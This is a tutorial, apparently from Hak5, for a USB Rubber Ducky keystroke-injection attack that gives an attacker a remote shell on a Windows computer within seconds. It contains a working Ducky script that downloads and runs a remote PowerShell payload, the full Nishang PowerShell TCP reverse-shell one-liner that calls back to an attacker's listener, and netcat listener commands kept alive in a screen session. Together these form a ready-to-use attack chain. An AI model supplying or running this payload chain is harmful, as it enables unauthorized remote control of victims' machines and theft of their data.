The 3 Second Reverse Shell with a USB Rubber Ducky

In this tutorial we’ll be setting up a Reverse Shell payload on the USB Rubber Ducky that’ll execute in just 3 seconds.

A reverse shell is a type of shell where the victim computer calls back to an attacker’s computer. The attacking computer typically listens on a specific port. When it receives the connection it is then able to execute commands on the victim computer. In essence it’s remote control of a computer.

Previously we had shown ways of obtaining a reverse shell from a target computer by injecting a netcat binary into the computer. There are 3 common ways to inject a binary into a system – either by downloading it from the network, copying it over mass storage, or typing the program code right into the computer. The later is a novel way of bypassing countermeasures, though typing in a base64 encoded file then converting it into a binary takes considerable time. The 2 kilobyte netcat payload requires around 20 seconds to execute.

In this example we’re taking a different approach and rather using Powershell – the advanced Windows command-line shell and scripting language. Powershell was first introduced with Windows XP SP2 and it has since been included by default in Windows since Vista. It’s a lot more sophisticated than the CMD, the old DOS-style command prompt found in nearly every version of Windows.

Using powershell we can implement a netcat like reverse shell. Nishang, a framework and collection of penetration testing Powershell scripts and payloads, hosts a simple 1-line reverse shell that’ll call back to our netcat listener.

https://github.com/samratashok/nishang

Unfortunately the 1-line reverse shell just over the text field character limit of the Windows run dialog. For this reason we’ll need to stage the payload – meaning our USB Rubber Ducky payload will download and execute the actual reverse shell Powershell script hosted on our web server.

The Ducky Script

DELAY 1000
GUI r
DELAY 100
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/payload.ps1');"
ENTER

Replace the URL above with the address of your web server where we’ll be hosting the powershell reverse shell script.

HTTPS is highly encouraged for the web server. See Hak5 episode 2023 for a video tutorial on setting up a free Let’s Encrypt SSL certificate.

This very short USB Rubber Ducky payload simply opens the Windows run dialog, types in a single line of powershell and runs it. This powershell snippet will download and execute whatever other powershell script we host on our web server.

The Web Server

On our web server we’ll need to host the powershell reverse shell code. This powershell TCP one liner from Nishang works great:

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1

$sm=(New-Object Net.Sockets.TCPClient("hostofnetcatlistener",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

There are many more powerful reverse shells as part of the Nishang suite – but this one serves our example well. Host it on your web server as referenced by the ducky script above. Be sure to change the host and port in the code above to match that of your netcat listener.

The Netcat Listener

Now that we have our USB Rubber Ducky payload written and our powershell reverse shell code hosted on our web server we’re ready to setup the listener. A simple netcat -lp 4444 from our publicly accessible server referenced in the powershell above will do fine in this case.

To keep our netcat listener running even after a shell terminates we might want to wrap it in a simple bash loop.

while true; do nc -l -p 4444; done

If we’re running this netcat listener on a VPS or other server on the Internet somewhere, it’s safe to assume we’re connected over SSH. If that’s the case, in order to prevent the netcat listener from dieing when our SSH session ends, we can also run it in a screen session.

screen -dmS netcat_listener bash -c 'while true; do nc -lp 4444; done'

The above command creates a detached screen session named “netcat_listener” running our netcat listener in a bash loop. We can then list the available screen sessions with screen -list.

screen -list
There is a screen on:
	22794.netcat_listener 	(11/01/2016 03:36:01 PM)	(Detached)
1 Socket in /var/run/screen/S-dk.

We can then interact with the “netcat_listener” screen session with screen -r netcat_listener. Detaching from the screen session is a matter of pressing the keyboard combo CTRL+a, d. See Hak5 episode 818 for a more in-depth video on the Linux screen program, or see this handy screen quick reference guide.

At this point we have a persistent netcat listener on our server in the cloud, a powershell payload hosted on our web server and a ducky script ready to nab this reverse shell in seconds. The last part is to encode the payload and load it on our USB Rubber Ducky. See step 2 from our 15 Second Password Hack – Mr Robot Style with the USB Rubber Ducky article for a quick guide.

Quack Quack!



Also in USB Rubber Ducky

Detect Ready - Smarter Initial Delays for Keystroke Injection Attacks with the USB Rubber Ducky
Detect Ready - Smarter Initial Delays for Keystroke Injection Attacks with the USB Rubber Ducky

Since the beginning of Keystroke Injection attacks using DuckyScript 1.0, conventional wisdom has been to begin payloads with a 3000 millisecond delay (DELAY 3000). Using DuckyScript 3.0 extensions, this may be reduced to as little as 25 milliseconds!
Keystroke Reflection - Side-Channel Exfiltration for the USB Rubber Ducky
Keystroke Reflection - Side-Channel Exfiltration for the USB Rubber Ducky

Keystroke reflection exploits the defacto standard keyboard-computer architecture implemented by all IBM-PC compatibles since 1984 and adopted in usb-hid to provide a side-channel exfiltration pathway that impacts nearly all personal computers from the last 4 decades.
What is the best security awareness payload for the Rubber Ducky?
What is the best security awareness payload for the Rubber Ducky?

A two second HID attack against Windows and Mac that launches the website of your choosing. That's by far the most effective security awareness payload for the USB Rubber Ducky.